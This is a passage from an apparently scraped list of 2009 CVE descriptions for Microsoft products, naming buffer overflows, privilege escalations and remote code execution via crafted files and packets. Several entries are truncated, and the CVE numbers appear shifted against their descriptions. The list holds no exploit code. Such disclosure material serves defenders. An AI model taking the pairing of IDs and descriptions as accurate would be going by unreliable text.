Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability." [CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability." [CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability." [CVE-2009-2498] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 and Windows Media Services 9.1 and 2008 do not properly parse malformed headers in Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted (1) .asf, (2) .wmv, or (3) .wma file, aka "Windows Media Header Parsing Invalid Free Vulnerability." [CVE-2009-2497] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0, 2.0 SP1, 2.0 SP2, 3.5, and 3.5 SP1, and Silverlight 2, does not properly handle interfaces, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted Silverlight application, (3) a crafted ASP.NET application, or (4) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Vulnerability." [CVE-2009-2496] Heap-based buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 allows remote attackers to execute arbitrary code via unspecified parameters to unknown methods, aka "Office Web Components Heap Corruption Vulnerability." [CVE-2009-2495] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold and SP1, and Visual C++ 2005 SP1 and 2008 Gold and SP1 does not properly enforce string termination, which allows remote attackers to obtain sensitive information via a crafted HTML document with an ATL (1) component or (2) control that triggers a buffer over-read, related to ATL headers and buffer allocation, aka "ATL Null String Vulnerability." [CVE-2009-2494] The Active Template Library (ATL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via vectors related to erroneous free operations after reading a variant from a stream and deleting this variant, aka "ATL Object Type Mismatch Vulnerability." [CVE-2009-2493] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold and SP1, and Visual C++ 2005 SP1 and 2008 Gold and SP1 [CVE-2009-1930] The Telnet service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote Telnet servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, aka "Telnet Credential Reflection Vulnerability," a related issue to CVE-2000-0834. [CVE-2009-1929] Heap-based buffer overflow in the Microsoft Terminal Services Client ActiveX control running RDP 6.1 on Windows XP SP2, Vista SP1 or SP2, or Server 2008 Gold or SP2 [CVE-2009-1928] Stack consumption vulnerability in the LDAP service in Active Directory on Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2 [CVE-2009-1926] Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to cause a denial of service (TCP outage) via a series of TCP sessions that have pending data and a (1) small or (2) zero receive window size, and remain in the FIN-WAIT-1 or FIN-WAIT-2 state indefinitely, aka "TCP/IP Orphaned Connections Vulnerability." [CVE-2009-1925] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly manage state information, which allows remote attackers to execute arbitrary code by sending packets to a listening service, and thereby triggering misinterpretation of an unspecified field as a function pointer, aka "TCP/IP Timestamps Code Execution Vulnerability." [CVE-2009-1924] Integer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 allows remote WINS replication partners to execute arbitrary code via crafted data structures in a packet, aka "WINS Integer Overflow Vulnerability." [CVE-2009-1923] Heap-based buffer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted WINS replication packet that triggers an incorrect buffer-length calculation, aka "WINS Heap Overflow Vulnerability." [CVE-2009-1922] The Message Queuing (aka MSMQ) service for Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP2, and Vista Gold does not properly validate unspecified IOCTL request data from user mode before passing this data to kernel mode, which allows local users to gain privileges via a crafted request, aka "MSMQ Null Pointer Vulnerability." [CVE-2009-1546] Integer overflow in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows allows remote attackers to execute arbitrary code on a Windows 2000 SP4 system via a crafted AVI file, or cause a denial of service on a Windows XP SP2 or SP3, Server 2003 SP2, Vista Gold, SP1, or SP2, or Server 2008 Gold or SP2 system via a crafted AVI file, aka "AVI Integer Overflow Vulnerability." [CVE-2009-1545] Unspecified vulnerability in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed header in a crafted AVI file, aka "Malformed AVI Header Vulnerability." [CVE-2009-1544] Double free vulnerability in the Workstation service in Microsoft Windows allows remote authenticated users to gain privileges via a crafted RPC message to a Windows XP SP2 or SP3 or Server 2003 SP2 system, or cause a denial of service via a crafted RPC message to a Vista Gold, SP1, or SP2 or Server 2008 Gold or SP2 system, aka "Workstation Service Memory Corruption Vulnerability." [CVE-2009-1542] The Virtual Machine Monitor (VMM) in Microsoft Virtual PC 2004 SP1, 2007, and 2007 SP1, and Microsoft Virtual Server 2005 R2 SP1, does not enforce CPU privilege-level requirements for all machine instructions, which allows guest OS users to execute arbitrary kernel-mode code and gain privileges within the guest OS via a crafted application, aka "Virtual PC and Virtual Server Privileged Instruction Decoding Vulnerability." [CVE-2009-1539] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 does not properly validate unspecified size fields in QuickTime media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DirectX Size Validation Vulnerability." [CVE-2009-1538] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 performs updates to pointers without properly validating unspecified data values, which allows remote attackers to execute arbitrary code via a crafted QuickTime media file, aka "DirectX Pointer Validation Vulnerability." [CVE-2009-1537] Unspecified vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted QuickTime media file, as exploited in the wild in May 2009, aka "DirectX NULL Byte Overwrite Vulnerability." [CVE-2009-1536] ASP.NET in Microsoft .NET Framework 2.0 SP1 and SP2 and 3.5 Gold and SP1, when ASP 2.0 is used in integrated mode on IIS 7.0, does not properly manage request scheduling, which allows remote attackers to cause a denial of service (daemon outage) via a series of crafted HTTP requests, aka "Remote Unauthenticated Denial of Service in ASP.NET Vulnerability." [CVE-2009-1534] Buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2000 Web Components SP3, Office XP Web Components SP3, BizTalk Server 2002, and Visual Studio .NET 2003 SP1 allows remote attackers to execute arbitrary code via crafted property values, aka "Office Web Components Buffer Overflow Vulnerability." [CVE-2009-1533] Buffer overflow in the Works for Windows document converters in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, Office 2007 SP1, and Works 8.5 and 9 allows remote attackers to execute arbitrary code via a crafted Works .wps file that triggers memory corruption, aka "File Converter Buffer Overflow Vulnerability." [CVE-2009-1491] McAfee GroupShield for Microsoft Exchange on Exchange Server 2000, and possibly other anti-virus or anti-spam products from McAfee or other vendors, does not scan X- headers for malicious content, which allows remote attackers to bypass virus detection via a crafted message, as demonstrated by a message with an X-Testing header and no message body. [CVE-2009-1216] Multiple unspecified vulnerabilities in (1) unlzh.c and (2) unpack.c in the gzip libraries in Microsoft Windows Server 2008, Windows Services for UNIX 3.0 and 3.5, and the Subsystem for UNIX-based Applications (SUA) [CVE-2009-1141] Microsoft Internet Explorer 6 for Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via unspecified DHTML function calls related to a tr element and the "insertion, deletion and attributes of a table cell," which trigger memory corruption when the window is destroyed, aka "DHTML Object Memory Corruption Vulnerability." [CVE-2009-1139] Memory leak in the LDAP service in Active Directory on Microsoft Windows 2000 SP4 and Server 2003 SP2, and Active Directory Application Mode (ADAM) on Windows XP SP2 and SP3 and Server 2003 SP2, allows remote attackers to cause a denial of service (memory consumption and service outage) via (1) LDAP or (2) LDAPS requests with unspecified OID filters, aka "Active Directory Memory Leak Vulnerability." [CVE-2009-1138] The LDAP service in Active Directory on Microsoft Windows 2000 SP4 does not properly free memory for LDAP and LDAPS requests, which allows remote attackers to execute arbitrary code via a request that uses hexadecimal encoding, whose associated memory is not released, related to a "DN AttributeValue," aka "Active Directory Invalid Free Vulnerability." NOTE: this issue is probably a memory leak. [CVE-2009-1137] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0226, and CVE-2009-0227. [CVE-2009-1136] The Microsoft Office Web Components Spreadsheet ActiveX control (aka OWC10 or OWC11), as distributed in Office XP SP3 and Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 Gold and SP1, and Office Small Business Accounting 2006, when used in Internet Explorer, allows remote attackers to execute arbitrary code via a crafted call to the msDataSourceObject method, as exploited in the wild in July and August 2009, aka "Office Web Components HTML Script Vulnerability." [CVE-2009-1135] Microsoft Internet Security and Acceleration (ISA) Server 2006 Gold and SP1, when Radius OTP is enabled, uses the HTTP-Basic authentication method, which allows remote attackers to gain the privileges of an arbitrary account, and access published web pages, via vectors involving attempted access to a network resource behind the ISA Server, aka "Radius OTP Bypass Vulnerability." [CVE-2009-1134] Excel in 2007 Microsoft Office System SP1 and SP2 [CVE-2009-1133] Heap-based buffer overflow in Microsoft Remote Desktop Connection (formerly Terminal Services Client) running RDP 5.0 through 6.1 on Windows, and Remote Desktop Connection Client for Mac 2.0, allows remote attackers to execute arbitrary code via unspecified parameters, aka "Remote Desktop Connection Heap Overflow Vulnerability." [CVE-2009-1132] Heap-based buffer overflow in the Wireless LAN AutoConfig Service (aka Wlansvc) in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed wireless frame, aka "Wireless Frame Parsing Remote Code Execution Vulnerability." [CVE-2009-1131] Multiple stack-based buffer overflows in Microsoft Office PowerPoint 2000 SP3 allow remote attackers to execute arbitrary code via a large amount of data associated with unspecified atoms in a PowerPoint file that triggers memory corruption, aka "Data Out of Bounds Vulnerability." [CVE-2009-1130] Heap-based buffer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3, and PowerPoint in Microsoft Office 2004 for Mac, allows remote attackers to execute arbitrary code via a crafted structure in a Notes container in a PowerPoint file that causes PowerPoint to read more data than was allocated when creating a C++ object, leading to an overwrite of a function pointer, aka "Heap Corruption Vulnerability." [CVE-2009-1129] Multiple stack-based buffer overflows in the PowerPoint 95 importer (PP7X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allow remote attackers to execute arbitrary code via an inconsistent record length in sound data in a file that uses a PowerPoint 95 (PPT95) native file format, aka "PP7 Memory Corruption Vulnerability," a different vulnerability than CVE-2009-1128. [CVE-2009-1128] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 95 native file format, leading to memory corruption, aka "PP7 Memory Corruption Vulnerability," a different vulnerability than CVE-2009-1129. [CVE-2009-1127] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not correctly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k NULL Pointer Dereferencing Vulnerability." [CVE-2009-1126] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate the user-mode input associated with the editing of an unspecified desktop parameter, which allows local users to gain privileges via a crafted application, aka "Windows Desktop Parameter Edit Vulnerability." [CVE-2009-1125] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application, aka "Windows Driver Class Registration Vulnerability." [CVE-2009-1124] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate user-mode pointers in unspecified error conditions, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Pointer Validation Vulnerability." [CVE-2009-1123] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate changes to unspecified kernel objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Desktop Vulnerability." [CVE-2009-1122] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.0 on Windows 2000 SP4 does not properly decode URLs, which allows remote attackers to bypass authentication, and possibly read or create files, via a crafted HTTP request, aka "IIS 5.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1535. [CVE-2009-1043] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-1011] Unspecified vulnerability in the Outside In Technology component in Oracle Application Server 8.2.2 and 8.3.0 allows local users to affect confidentiality, integrity, and availability, related to HTML. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on reliable researcher claims that this issue is for multiple integer overflows in a function that parses an optional data stream within a Microsoft Office file, leading to a heap-based buffer overflow. [CVE-2009-0901] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold, and Visual C++ 2005 SP1 and 2008 Gold and SP1 [CVE-2009-0568] The RPC Marshalling Engine (aka NDR) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly maintain its internal state, which allows remote attackers to overwrite arbitrary memory locations via a crafted RPC message that triggers incorrect pointer reading, related to "IDL interfaces containing a non-conformant varying array" and FC_SMVARRAY, FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPC Marshalling Engine Vulnerability." [CVE-2009-0566] Microsoft Office Publisher 2007 SP1 does not properly calculate object handler data for Publisher files, which allows remote attackers to execute arbitrary code via a crafted file in a legacy format that triggers memory corruption, aka "Pointer Dereference Vulnerability." [CVE-2009-0565] Buffer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, and 2007 SP1 and SP2 [CVE-2009-0563] Stack-based buffer overflow in Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-0562] The Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 does not properly allocate memory, which allows remote attackers to execute arbitrary code via unspecified vectors that trigger "system state" corruption, aka "Office Web Components Memory Allocation Vulnerability." [CVE-2009-0561] Integer overflow in Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0560] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0559] Stack-based buffer overflow in Excel in Microsoft Office 2000 SP3 and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted Excel file with a malformed record object, aka "String Copy Stack-Based Overrun Vulnerability." [CVE-2009-0558] Array index error in Excel in Microsoft Office 2000 SP3 and Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac, allows remote attackers to execute arbitrary code via a crafted Excel file with a malformed record object, aka "Array Indexing Memory Corruption Vulnerability." [CVE-2009-0557] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0556] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3, and PowerPoint in Microsoft Office 2004 for Mac, allows remote attackers to execute arbitrary code via a PowerPoint file with an OutlineTextRefAtom containing an an invalid index value that triggers memory corruption, as exploited in the wild in April 2009 by Exploit:Win32/Apptom.gen, aka "Memory Corruption Vulnerability." [CVE-2009-0554] Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0553] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0552] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 on Windows XP SP2 and SP3, and 6 on Windows Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0551] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 does not properly handle transition errors in a request for one HTTP document followed by a request for a second HTTP document, which allows remote attackers to execute arbitrary code via vectors involving (1) multiple crafted pages on a web site or (2) a web page with crafted inline content such as banner advertisements, aka "Page Transition Memory Corruption Vulnerability." [CVE-2009-0550] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 [CVE-2009-0549] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0320] Microsoft Windows XP, Server 2003 and 2008, and Vista exposes I/O activity measurements of all processes, which allows local users to obtain sensitive information, as demonstrated by reading the I/O Other Bytes column in Task Manager (aka taskmgr.exe) to estimate the number of characters that a different user entered at a runas.exe password prompt, related to a "benchmarking attack." [CVE-2009-0239] Cross-site scripting (XSS) vulnerability in Windows Search 4.0 for Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted file that appears in a preview in a search result, aka "Script Execution in Windows Search Vulnerability." [CVE-2009-0238] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 [CVE-2009-0235] Stack-based buffer overflow in the Word 97 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Word 97 file that triggers memory corruption, related to use of inconsistent integer data sizes for an unspecified length field, aka "WordPad Word 97 Text Converter Stack Overflow Vulnerability." [CVE-2009-0234] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 does not properly cache crafted DNS responses, which makes it easier for remote attackers to predict transaction IDs and poison caches by sending many crafted DNS queries that trigger "unnecessary lookups," aka "DNS Server Response Validation Vulnerability." [CVE-2009-0233] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not reuse cached DNS responses in all applicable situations, which makes it easier for remote attackers to predict transaction IDs and poison caches by simultaneously sending crafted DNS queries and responses, aka "DNS Server Query Validation Vulnerability." [CVE-2009-0232] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2009-0231] The Embedded OpenType (EOT) Font Engine (T2EMBED.DLL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table in a data record that triggers an integer truncation and a heap-based buffer overflow, aka "Embedded OpenType Font Heap Overflow Vulnerability." [CVE-2009-0230] The Windows Print Spooler in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows remote authenticated users to gain privileges via a crafted RPC message that triggers loading of a DLL file from an arbitrary directory, aka "Print Spooler Load Library Vulnerability." [CVE-2009-0229] The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows local users to read arbitrary files via a crafted separator page, aka "Print Spooler Read File Vulnerability." [CVE-2009-0228] Stack-based buffer overflow in the EnumeratePrintShares function in Windows Print Spooler Service (win32spl.dll) in Microsoft Windows 2000 SP4 allows remote printer servers to execute arbitrary code via a a crafted ShareName in a response to an RPC request, related to "printing data structures," aka "Buffer Overflow in Print Spooler Vulnerability." [CVE-2009-0227] Stack-based buffer overflow in the PowerPoint 4.2 conversion filter (PP4X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via a large number of structures in sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0226, and CVE-2009-1137. [CVE-2009-0226] Stack-based buffer overflow in the PowerPoint 4.2 conversion filter in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via a long string in sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0225] Microsoft Office PowerPoint 2002 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 95 native file format, leading to improper "array indexing" and memory corruption, aka "PP7 Memory Corruption Vulnerability." [CVE-2009-0224] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-0223] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0226, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0222] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to a "pointer overwrite" and memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0223, CVE-2009-0226, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0221] Integer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a PowerPoint file containing a crafted record type for "collaboration information for different slides" that contains a field that specifies a large number of records, which triggers an under-allocated buffer and a heap-based buffer overflow, aka "Integer Overflow Vulnerability." [CVE-2009-0220] Multiple stack-based buffer overflows in the PowerPoint 4.0 importer (PP4X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allow remote attackers to execute arbitrary code via crafted formatting data for paragraphs in a file that uses a PowerPoint 4.0 native file format, related to (1) an incorrect calculation from a record header, or (2) an interget that is used to specify the number of bytes to copy, aka "Legacy File Format Vulnerability." [CVE-2009-0202] Array index error in FL21WIN.DLL in the PowerPoint Freelance Windows 2.1 Translator in Microsoft PowerPoint 2000 and 2002 allows remote attackers to execute arbitrary code via a Freelance file with unspecified "layout information" that triggers a heap-based buffer overflow. [CVE-2009-0102] Microsoft Project 2000 SR1 and 2002 SP1, and Office Project 2003 SP3, does not properly handle memory allocation for Project files, which allows remote attackers to execute arbitrary code via a malformed file, aka "Project Memory Validation Vulnerability." [CVE-2009-0100] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 [CVE-2009-0099] The Electronic Messaging System Microsoft Data Base (EMSMDB32) provider in Microsoft Exchange 2000 Server SP3 and Exchange Server 2003 SP2, as used in Exchange System Attendant, allows remote attackers to cause a denial of service (application outage) via a malformed MAPI command, aka "Literal Processing Vulnerability." [CVE-2009-0098] Microsoft Exchange 2000 Server SP3, Exchange Server 2003 SP2, and Exchange Server 2007 SP1 do not properly interpret Transport Neutral Encapsulation (TNEF) properties, which allows remote attackers to execute arbitrary code via a crafted TNEF message, aka "Memory Corruption Vulnerability." [CVE-2009-0097] Microsoft Office Visio 2002 SP2 and 2003 SP3 does not properly validate memory allocation for Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Memory Corruption Vulnerability." [CVE-2009-0096] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 does not properly perform memory copy operations for object data, which allows remote attackers to execute arbitrary code via a crafted Visio document, aka "Memory Corruption Vulnerability." [CVE-2009-0095] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 does not properly validate object data in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Memory Validation Vulnerability." [CVE-2009-0094] The WINS server in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 does not restrict registration of the (1) "wpad" and (2) "isatap" NetBIOS names, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) and Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) features, and conduct man-in-the-middle attacks by spoofing a proxy server or ISATAP route, by registering one of these names in the WINS database, aka "WPAD WINS Server Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0093] Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not restrict registration of the "wpad" hostname, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) feature, and conduct man-in-the-middle attacks by spoofing a proxy server, via a Dynamic Update request for this hostname, aka "DNS Server Vulnerability in WPAD Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0091] Microsoft .NET Framework 2.0, 2.0 SP1, and 3.5 does not properly enforce a certain type-equality constraint in .NET verifiable code, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft .NET Framework Type Verification Vulnerability." [CVE-2009-0090] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, and 2.0 SP1 does not properly validate .NET verifiable code, which allows remote attackers to obtain unintended access to stack memory, and execute arbitrary code, via (1) a crafted XAML browser application (XBAP), (2) a crafted 